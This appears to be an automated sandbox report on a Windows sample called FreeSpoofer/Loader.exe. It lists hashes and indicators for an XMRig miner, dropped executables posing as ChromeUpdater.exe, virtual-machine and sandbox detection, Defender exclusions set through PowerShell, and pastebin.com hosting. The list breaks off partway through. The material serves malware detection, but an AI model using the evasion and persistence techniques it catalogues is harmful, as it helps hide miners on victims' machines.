Analysis
-
max time kernel
256s -
max time network
252s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241211-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241211-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
22-12-2024 15:39
General
-
Target
FreeSpoofer/Loader.exe
-
Size
26.4MB
-
MD5
aec49804a232eb45a7cf41e2dfef37fc
-
SHA1
5cedbd522c3c40305f6d656f57edf9b6a89d7e21
-
SHA256
deb7985a8f9a56f2dcbfdd4c5fa4732daad89ce82733818915f3a4e07c2d3b09
-
SHA512
ad9cf94db9a109e0f3a191169025c4f5ec86aca68937c373380dcb84c728b5817bf5e7bee8eea47b7cb82f5415234ab08a53f26030a5573d574477571f3a3d3d
-
SSDEEP
786432:pfjx8ZSLqcnnTNPefii+ydGI5mM3y9nEDQ:pfadJy9nQQ
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 12 IoCs
description pid Process procid_target PID 1836 created 3560 1836 HQwlrLZylofyEqTIOcaDLwMgBreuXj.exe 57 PID 1836 created 3560 1836 HQwlrLZylofyEqTIOcaDLwMgBreuXj.exe 57 PID 1836 created 3560 1836 HQwlrLZylofyEqTIOcaDLwMgBreuXj.exe 57 PID 1836 created 3560 1836 HQwlrLZylofyEqTIOcaDLwMgBreuXj.exe 57 PID 3588 created 3560 3588 ChromeUpdater.exe 57 PID 3588 created 3560 3588 ChromeUpdater.exe 57 PID 3588 created 3560 3588 ChromeUpdater.exe 57 PID 3588 created 3560 3588 ChromeUpdater.exe 57 PID 1892 created 3560 1892 iIejXplCjaCpPshklkztydsmNmHZJd.exe 57 PID 1892 created 3560 1892 iIejXplCjaCpPshklkztydsmNmHZJd.exe 57 PID 1892 created 3560 1892 iIejXplCjaCpPshklkztydsmNmHZJd.exe 57 PID 1892 created 3560 1892 iIejXplCjaCpPshklkztydsmNmHZJd.exe 57 -
Xmrig family
-
Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions Loader.exe -
XMRig Miner payload 6 IoCs
resource yara_rule behavioral1/memory/3588-170-0x00007FF744270000-0x00007FF744C3A000-memory.dmp xmrig behavioral1/memory/3728-173-0x00007FF7B9C50000-0x00007FF7BA43F000-memory.dmp xmrig behavioral1/memory/3728-175-0x00007FF7B9C50000-0x00007FF7BA43F000-memory.dmp xmrig behavioral1/memory/3728-244-0x00007FF7B9C50000-0x00007FF7BA43F000-memory.dmp xmrig behavioral1/memory/3728-246-0x00007FF7B9C50000-0x00007FF7BA43F000-memory.dmp xmrig behavioral1/memory/3728-275-0x00007FF7B9C50000-0x00007FF7BA43F000-memory.dmp xmrig -
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1468 powershell.exe 1164 powershell.exe 4616 powershell.exe 2700 powershell.exe 1764 powershell.exe 5108 powershell.exe -
Looks for VMWare Tools registry key 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\VMware, Inc.\VMware Tools Loader.exe -
Sets service image path in registry 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\yEeWrbyDJbXQqwMexdMRqPvnMuK\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\yEeWrbyDJbXQqwMexdMRqPvnMuK" xJOFQyQVajokVuTmNuWkbEPjfhsqzd.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\qwWZtbAiSoQAWWPibT\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\qwWZtbAiSoQAWWPibT" RXIsaMSgExwsQRZvqeJdCLzcPXqSvl.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Loader.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Loader.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1411052346-3904498293-150013998-1000\Control Panel\International\Geo\Nation Loader.exe -
Executes dropped EXE 8 IoCs
pid Process 752 xJOFQyQVajokVuTmNuWkbEPjfhsqzd.exe 3148 VwjhTKJShUEzNUQUbOmusUFFnvbrGZ.exe 1836 HQwlrLZylofyEqTIOcaDLwMgBreuXj.exe 3588 ChromeUpdater.exe 3768 RXIsaMSgExwsQRZvqeJdCLzcPXqSvl.exe 4756 lSkEiMlDipseAiVZmeaeMXgcfZjaxg.exe 1892 iIejXplCjaCpPshklkztydsmNmHZJd.exe 1044 ChromeUpdater.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 15 pastebin.com 16 pastebin.com -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum Loader.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 Loader.exe -
Drops file in System32 directory 3 IoCs
description ioc Process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 3588 set thread context of 1060 3588 ChromeUpdater.exe 232 PID 3588 set thread context of 3728 3588 ChromeUpdater.exe 233 -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\Google\Chrome\ChromeUpdater.exe HQwlrLZylofyEqTIOcaDLwMgBreuXj.exe File created C:\Program Files\Google\Libs\WR64.sys ChromeUpdater.exe File created C:\Program Files\Google\Chrome\ChromeUpdater.exe iIejXplCjaCpPshklkztydsmNmHZJd.exe -
Drops file in Windows directory 11 IoCs
description ioc Process File opened for modification C:\Windows\Cursors\XxjTXzJtGEFsOhcCkyPNmWFMPEFeLH.sys Loader.exe File created C:\Windows\Cursors\ZbXpyjsfwVivgMOUNPyvEIRDpeVpEM.exe Loader.exe File created C:\Windows\Cursors\lSkEiMlDipseAiVZmeaeMXgcfZjaxg.exe Loader.exe File created C:\Windows\SoftwareDistribution\Download\yigFXnbZuXlKgPvmZJPqPTPkqBZEHW.exe Loader.exe File opened for modification C:\Windows\SoftwareDistribution\Download\yigFXnbZuXlKgPvmZJPqPTPkqBZEHW.exe Loader.exe File created C:\Windows\SoftwareDistribution\Download\BzlZTqnodfigdAxayGgieziFyrlYgv.exe Loader.exe File created C:\Windows\SoftwareDistribution\Download\vJNrXivruyOeNhoDChWnffEIMLaauU.exe Loader.exe File opened for modification C:\Windows\SoftwareDistribution\Download\vJNrXivruyOeNhoDChWnffEIMLaauU.exe Loader.exe File created C:\Windows\Cursors\XxjTXzJtGEFsOhcCkyPNmWFMPEFeLH.sys Loader.exe File opened for modification C:\Windows\Cursors\ZbXpyjsfwVivgMOUNPyvEIRDpeVpEM.exe Loader.exe File opened for modification C:\Windows\SoftwareDistribution\Download\BzlZTqnodfigdAxayGgieziFyrlYgv.exe Loader.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language VwjhTKJShUEzNUQUbOmusUFFnvbrGZ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe -
Enumerates system info in registry 2 TTPs 38 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Component Information reg.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1 reg.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 reg.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\9 reg.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 reg.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 reg.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 reg.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Configuration Data reg.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\7 reg.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 reg.exe Key created \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 reg.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\5 reg.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 reg.exe Set value (str) \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier = "1307987-b2d44ef9-A" reg.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\6 reg.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\7 reg.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier reg.exe Set value (str) \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier = "1414131-ae85b375-A" reg.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Configuration Data reg.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier reg.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\8 reg.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Component Information reg.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\4 reg.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\2 reg.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\3 reg.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\4 reg.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\5 reg.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\8 reg.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 reg.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\3 reg.exe Key created \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 reg.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1 reg.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier reg.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\6 reg.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier reg.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 reg.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\2 reg.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\9 reg.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3548 Loader.exe 3548 Loader.exe 3548 Loader.exe 3148 VwjhTKJShUEzNUQUbOmusUFFnvbrGZ.exe 3148 VwjhTKJShUEzNUQUbOmusUFFnvbrGZ.exe 1836 HQwlrLZylofyEqTIOcaDLwMgBreuXj.exe 1836 HQwlrLZylofyEqTIOcaDLwMgBreuXj.exe 1468 powershell.exe 1468 powershell.exe 1836 HQwlrLZylofyEqTIOcaDLwMgBreuXj.exe 1836 HQwlrLZylofyEqTIOcaDLwMgBreuXj.exe 1764 powershell.exe 1764 powershell.exe 1836 HQwlrLZylofyEqTIOcaDLwMgBreuXj.exe 1836 HQwlrLZylofyEqTIOcaDLwMgBreuXj.exe 1836 HQwlrLZylofyEqTIOcaDLwMgBreuXj.exe 1836 HQwlrLZylofyEqTIOcaDLwMgBreuXj.exe 3588 ChromeUpdater.exe 3588 ChromeUpdater.exe 1164 powershell.exe 1164 powershell.exe 3588 ChromeUpdater.exe 3588 ChromeUpdater.exe 5108 powershell.exe 5108 powershell.exe 3588 ChromeUpdater.exe 3588 ChromeUpdater.exe 3588 ChromeUpdater.exe 3588 ChromeUpdater.exe 3728 explorer.exe 3728 explorer.exe 3728 explorer.exe 3728 explorer.exe 3728 explorer.exe 3728 explorer.exe 3728 explorer.exe 3728 explorer.exe 3728 explorer.exe 3728 explorer.exe 3728 explorer.exe 3728 explorer.exe 3728 explorer.exe 3728 explorer.exe 3728 explorer.exe 3728 explorer.exe 3728 explorer.exe 3728 explorer.exe 3728 explorer.exe 3728 explorer.exe 3728 explorer.exe 3728 explorer.exe 3728 explorer.exe 3728 explorer.exe 3728 explorer.exe 3728 explorer.exe 3728 explorer.exe 3728 explorer.exe 3728 explorer.exe 3728 explorer.exe 3728 explorer.exe 3728 explorer.exe 3728 explorer.exe 3728 explorer.exe 3728 explorer.exe -
Suspicious behavior: LoadsDriver 2 IoCs
pid Process 752 xJOFQyQVajokVuTmNuWkbEPjfhsqzd.exe 3768 RXIsaMSgExwsQRZvqeJdCLzcPXqSvl.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
